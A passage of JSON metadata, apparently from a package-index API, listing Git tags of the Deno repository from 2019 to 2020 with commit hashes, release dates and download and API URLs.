parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/